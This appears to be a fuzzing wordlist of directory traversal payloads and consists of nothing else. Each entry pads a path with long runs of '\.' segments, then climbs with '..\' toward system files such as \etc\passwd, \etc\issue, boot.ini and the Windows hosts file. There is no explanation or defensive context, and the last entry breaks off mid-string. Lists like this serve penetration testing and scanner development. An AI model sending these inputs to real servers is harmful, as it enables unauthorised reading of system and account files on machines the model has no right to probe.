-.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\